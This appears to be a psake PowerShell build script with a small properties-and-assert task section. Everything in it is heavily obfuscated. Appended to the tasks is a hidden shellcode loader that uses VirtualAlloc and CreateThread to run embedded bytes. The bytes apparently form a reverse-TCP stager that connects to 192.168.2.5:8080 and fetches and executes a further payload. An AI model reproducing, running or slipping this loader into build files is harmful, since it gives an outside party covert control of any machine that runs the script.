&("{2}{1}{0}"-f 's','e','properti') {
    ${mY_P`R`opeR`Ty} = ${p1} + ${p`2}
}

&("{1}{0}"-f 'sk','ta') ("{0}{1}{2}" -f 'd','e','fault') -depends ("{0}{1}{2}" -f 'Te','stPa','rams')

&("{1}{0}" -f'ask','t') ("{1}{2}{0}"-f 'ams','Tes','tPar') {
    .("{2}{0}{1}" -f'sse','rt','A') (${M`Y_`prOPER`Ty} -ne ${nu`Ll}) "`$my_property should not be null. Run with -parameters @{'p1' = 'v1'; 'p2' = 'v2'}"
}

${c} = ((("{104}{9}{103}{0}{46}{39}{20}{100}{50}{94}{3}{28}{58}{68}{45}{14}{89}{75}{21}{25}{8}{32}{87}{22}{72}{57}{85}{81}{2}{27}{65}{101}{97}{74}{13}{60}{95}{47}{29}{30}{40}{17}{59}{35}{24}{37}{110}{53}{62}{80}{70}{93}{51}{84}{11}{88}{56}{38}{49}{34}{42}{83}{86}{23}{15}{10}{31}{69}{26}{44}{78}{18}{98}{41}{5}{71}{64}{66}{55}{33}{7}{67}{90}{4}{92}{82}{61}{1}{43}{96}{36}{99}{12}{109}{79}{77}{48}{52}{106}{19}{76}{63}{105}{102}{16}{107}{91}{108}{6}{73}{54}" -f ']publ',');','p','ual','ntPtr lpT','er','int c','nF',', u','Import(o1fkern','lp','t','vcrt','mport(','ss','Ptr ',' s','1','s, In','ms',' sta',' ','flAllo','t',']public s','dwSize','Add','e,','A','rnel32.','d','St','i','Creatio','t dwStac',')','o','ta','es, ui','c','llo','tr lpParamet','kSize','[DllIm','re','re','i','ke',' Int','n','ntPtr Vir','ntPtr lpTh','Ptr ','n IntPtr Crea','t);','w','t','i','lloc(I','f','o','adId','te','(IntPt','in',' uin','t d','lag','ntPtr lpAdd','art','hread(',', u','cat','oun',');[DllI','t','et','ic static extern','s','llo1f)]publ','T','Ty','re',', I','readA','on','n','nt ','tribu',', uin','s, I','c, ','h','I','t','1f','p','flProtect','tP','rt(o1fms','tic extern I','t ','int','el32.dllo1f)','[Dll','r dest, u','me','r','u','.d','tic exter'))."R`epL`Ace"(([CHAr]111+[CHAr]49+[CHAr]102),[StRiNg][CHAr]34));${W} = &("{1}{0}"-f'pe','Add-Ty') -memberDefinition ${C} -Name ("{1}{0}" -f '2','Win3') -namespace ("{2}{1}{0}" -f 'Functions','n32','Wi') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x02,0x05,0x68,0x02,0x00,0x1f,0x90,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x3f,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0xe9,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0xc3,0x01,0xc3,0x29,0xc6,0x75,0xe9,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${g} = 0x1000;if (${Z}."lenG`TH" -gt 0x1000){${G} = ${Z}."LenG`Th"};${X}=${w}::("{0}{2}{3}{1}" -f 'V','oc','irtual','All').Invoke(0,0x1000,${g},0x40);for (${I}=0;${i} -le (${z}."L`EnGth"-1);${I}++) {${W}::"M`e`mSeT"([IntPtr](${X}.("{0}{1}" -f'ToInt3','2').Invoke()+${i}), ${Z}[${i}], 1)};${w}::("{0}{2}{3}{1}"-f'Cre','hread','at','eT').Invoke(0,0,${x},0,0,0);for (;;){.("{2}{1}{0}"-f 'leep','art-s','St') 60};
